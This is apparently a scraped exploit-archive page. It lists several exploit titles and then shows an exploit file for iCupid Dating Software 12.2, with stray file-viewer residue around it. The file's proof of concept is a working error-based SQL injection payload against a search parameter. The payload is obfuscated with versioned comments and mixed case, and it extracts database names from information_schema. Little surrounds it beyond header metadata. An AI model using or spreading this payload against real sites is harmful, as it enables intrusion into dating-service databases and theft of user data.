
4 new exploits Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006) Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006) ALLPlayer 7.4 - Buffer Overflow (SEH Unicode) Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode) Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting AdvanDate iCupid Dating Software 12.2 - SQL Injection ClipBucket 2.8.3 - Multiple Vulnerabilities
28 lines
1.1 KiB
Text
Executable file
28 lines
1.1 KiB
Text
Executable file
# # # # #
|
|
# Exploit Title: iCupid Dating Software 12.2 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 15.08.2017
|
|
# Vendor Homepage : https://www.advandate.com/
|
|
# Software Link: https://www.advandate.com/dating-software-features/
|
|
# Demo: https://demo.advandate.com/
|
|
# Version: 12.2
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# http://localhost/[PATH]/index.php?dll=music&sub=search&keyword=[SQL]
|
|
# '+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''='
|
|
#
|
|
# Etc...
|
|
# # # # #
|
|
|
|
|